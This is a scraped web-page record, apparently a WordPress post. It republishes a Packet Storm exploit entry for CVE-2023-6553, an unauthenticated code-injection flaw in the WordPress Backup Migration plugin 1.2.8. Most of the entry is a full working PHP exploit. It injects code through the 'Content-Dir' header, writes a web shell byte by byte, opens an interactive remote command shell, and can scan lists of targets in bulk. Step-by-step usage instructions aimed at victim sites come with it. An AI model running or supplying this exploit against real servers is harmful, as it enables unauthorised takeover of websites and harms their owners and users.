{“lastseen”:”2025-11-25T19:09:16″,”description”:”WordPress Backup Migration plugin version 1.2.8 proof of concept code injection exploit for an older vulnerability from 2023…”,”published”:”2025-11-25T00:00:00″,”modified”:”2025-11-25T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Backup Migration 1.2.8 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:211997″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-6553″],”sourceData”:”=============================================================================================================================================\\n | # Title : WordPress Backup Migration 1.2.8 PHP Code Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/wordpress.org\/plugins\/backup-backup\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n 1. Vulnerability Overview\\n ————————-\\n A critical Remote Code Execution vulnerability exists in the WordPress (https:\/\/packetstorm.news\/files\/id\/207962\/)\\n plugin \\”Backup Migration\\” (backup-backup), allowing arbitrary PHP code\\n execution via an unsafe header parameter inside:\\n \\n \/wp-content\/plugins\/backup-backup\/includes\/backup-heart.php\\n \\n The plugin processes attacker-controlled content from the HTTP header\\n \\”Content-Dir\\” and writes it directly into PHP files inside the plugin\\n directory. This allows an attacker to:\\n \\n \u2022 Write arbitrary PHP files \\n \u2022 Overwrite internal plugin files \\n \u2022 Deploy a persistent web shell \\n \u2022 Achieve full remote command execution \\n \\n No authentication is required.\\n \\n ====================================================================\\n \\n 2. PHP Exploit Description\\n ————————–\\n This exploit is a full PHP CLI conversion of the original Python version.\\n It performs:\\n \\n \u2022 Vulnerability verification \\n \u2022 Payload file creation \\n \u2022 Arbitrary file write via hex-encoded characters \\n \u2022 Deployment of an interactive remote shell \\n \u2022 Cleanup of the temporary shell \\n \\n The exploit works even when many PHP execution functions are disabled.\\n \\n ====================================================================\\n \\n 3. Usage Instructions (CLI Mode)\\n ——————————–\\n \\n Save the file as:\\n \\n exploit.php\\n \\n Then run from terminal:\\n \\n php exploit.php -u https:\/\/target.com\\n \\n Options:\\n -u \\u003curl\\u003e Test and exploit a single target\\n -c Check only (no shell deployment)\\n -f \\u003cfile\\u003e Scan a list of targets (one per line)\\n -t \\u003cn\\u003e Number of concurrent workers (default 5)\\n -o \\u003cfile\\u003e Save vulnerable hosts to output file\\n –help Show help\\n \\n Examples:\\n \\n \u2022 Check vulnerability only:\\n php exploit.php -u https:\/\/site.com -c\\n \\n \u2022 Exploit and open interactive shell:\\n php exploit.php -u https:\/\/site.com\\n \\n \u2022 Scan targets list:\\n php exploit.php -f targets.txt -o vulnerable.txt\\n \\n ====================================================================\\n \\n 4. Saving The PHP Code (Important)\\n ———————————-\\n 1. Copy the PHP exploit code into a file named:\\n \\n exploit.php\\n \\n 2. Make sure PHP CLI is installed:\\n php -v\\n \\n 3. Give execution permission (Linux only):\\n chmod +x exploit.php\\n \\n 4. Run the exploit:\\n php exploit.php -u https:\/\/victim.com\\n \\n ====================================================================\\n \\n 5. How The Exploit Works\\n ————————\\n Step 1: Send payload using \\”Content-Dir\\” header \\n Step 2: Plugin writes attacker-controlled PHP to temporary file \\n Step 3: Exploit writes final shell using hex-encoded bytes \\n Step 4: Web shell copied into plugin directory \\n Step 5: Interactive command execution via HTTP requests \\n \\n The exploit shell uses GET parameter \\”?0=\\” to wrap command output with:\\n \\n [S] output [E]\\n \\n This allows clean extraction and parsing.\\n \\n ====================================================================\\n \\n 6. Full PHP Exploit Code\\n ————————\\n \\u003c?php\\n \/**\\n * CVE-2023-6553 Exploit \u2013 PHP CLI Version\\n * by Indoushka\\n *\/\\n \\n error_reporting(E_ALL);\\n ini_set(‘display_errors’, 1);\\n \\n class CVE_2023_6553 {\\n public $base_url;\\n public $temp_file_name;\\n public $random_file_name;\\n \\n public function __construct($base_url) {\\n $this-\\u003ebase_url = rtrim($base_url, ‘\/’);\\n $this-\\u003etemp_file_name = chr(rand(65,90)); \/\/ single random char\\n $this-\\u003erandom_file_name = substr(str_shuffle(\\”abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\\”),0,3) . \\”.php\\”;\\n }\\n \\n public function send_payload($payload) {\\n $url = $this-\\u003ebase_url . \\”\/wp-content\/plugins\/backup-backup\/includes\/backup-heart.php\\”;\\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_HTTPHEADER =\\u003e [\\”Content-Dir: $payload\\”],\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false\\n ]);\\n $res = curl_exec($ch);\\n $err = curl_errno($ch);\\n curl_close($ch);\\n return ($err===0);\\n }\\n \\n public function check_vulnerability() {\\n $random_char = chr(rand(65,90));\\n $payload = \\”\\u003c?php fwrite(fopen(‘{$this-\\u003etemp_file_name}’,’w’),'{$random_char}’);?\\u003e\\”;\\n $this-\\u003esend_payload($payload);\\n \\n $url = $this-\\u003ebase_url . \\”\/wp-content\/plugins\/backup-backup\/includes\/{$this-\\u003etemp_file_name}\\”;\\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false\\n ]);\\n $res = curl_exec($ch);\\n curl_close($ch);\\n \\n if(trim($res) === $random_char) {\\n echo \\”[+] {$this-\\u003ebase_url} is vulnerable to CVE-2023-6553\\\\n\\”;\\n return true;\\n }\\n return false;\\n }\\n \\n public function write_string_to_file($string_to_write) {\\n $init = \\”\\u003c?php fwrite(fopen(‘{$this-\\u003etemp_file_name}’,’w’),”);?\\u003e\\”;\\n $this-\\u003esend_payload($init);\\n \\n $len = strlen($string_to_write);\\n for($i=0;$i\\u003c$len;$i++){\\n $hex = bin2hex($string_to_write[$i]);\\n $cmd = \\”\\u003c?php fwrite(fopen(‘{$this-\\u003etemp_file_name}’,’a’),\\\\\\”\\\\\\\\x{$hex}\\\\\\”);?\\u003e\\”;\\n if(!$this-\\u003esend_payload($cmd)){\\n echo \\”Failed at character: {$string_to_write[$i]}\\\\n\\”;\\n return false;\\n }\\n }\\n \\n $copy = \\”\\u003c?php copy(‘{$this-\\u003etemp_file_name}’,'{$this-\\u003erandom_file_name}’);?\\u003e\\”;\\n $this-\\u003esend_payload($copy);\\n $delete = \\”\\u003c?php unlink(‘{$this-\\u003etemp_file_name}’);?\\u003e\\”;\\n $this-\\u003esend_payload($delete);\\n return true;\\n }\\n \\n public function retrieve_command_output($command) {\\n $url = $this-\\u003ebase_url . \\”\/wp-content\/plugins\/backup-backup\/includes\/{$this-\\u003erandom_file_name}?0=\\” . urlencode($command);\\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false\\n ]);\\n $res = curl_exec($ch);\\n curl_close($ch);\\n if(preg_match(\\”\/\\\\\\\\[S\\\\\\\\](.*?)\\\\\\\\[E\\\\\\\\]\/s\\”,$res,$m)) return $m[1];\\n return \\”No output or functions disabled.\\”;\\n }\\n \\n public function interactive_shell() {\\n echo \\”[+] Entering interactive shell (type ‘exit’ to quit)\\\\n\\”;\\n while(true){\\n echo \\”# \\”;\\n $cmd = trim(fgets(STDIN));\\n if($cmd === \\”exit\\”) break;\\n echo $this-\\u003eretrieve_command_output($cmd) . \\”\\\\n\\”;\\n }\\n }\\n }\\n \\n \/\/ —————- CLI Handler —————–\\n $options = getopt(\\”u:f:t:o:c\\”);\\n $url = $options[‘u’] ?? null;\\n $file = $options[‘f’] ?? null;\\n $threads = intval($options[‘t’] ?? 5);\\n $output = $options[‘o’] ?? null;\\n $check_only = isset($options[‘c’]);\\n \\n if($url){\\n $exploit = new CVE_2023_6553($url);\\n if($exploit-\\u003echeck_vulnerability()){\\n if(!$check_only){\\n $shell_code = ‘\\u003c?php echo \\”[S]\\”;echo `$_GET[0]`;echo \\”[E]\\”;?\\u003e’;\\n if($exploit-\\u003ewrite_string_to_file($shell_code)){\\n echo \\”[+] Shell deployed successfully!\\\\n\\”;\\n $exploit-\\u003einteractive_shell();\\n echo \\”[!] Deleting shell…\\\\n\\”;\\n $exploit-\\u003esend_payload(\\”\\u003c?php unlink(‘{$exploit-\\u003erandom_file_name}’);?\\u003e\\”);\\n }\\n }\\n } else {\\n echo \\”[!] {$url} is not vulnerable.\\\\n\\”;\\n }\\n } elseif($file){\\n $urls = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n foreach($urls as $u){\\n $exploit = new CVE_2023_6553($u);\\n $exploit-\\u003echeck_vulnerability();\\n if($output \\u0026\\u0026 $exploit-\\u003echeck_vulnerability()){\\n file_put_contents($output,$u.PHP_EOL,FILE_APPEND);\\n }\\n }\\n } else {\\n echo \\”Usage: php exploit.php -u \\u003curl\\u003e [-c] | -f \\u003cfile\\u003e [-t threads] [-o output]\\\\n\\”;\\n }\\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/211997″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211997\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-25T19:09:16″,”description”:”WordPress Backup Migration plugin version 1.2.8 proof of concept code injection exploit for an older vulnerability from 2023…”,”published”:”2025-11-25T00:00:00″,”modified”:”2025-11-25T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Backup Migration 1.2.8 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:211997″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-6553″],”sourceData”:”=============================================================================================================================================\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-27584","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n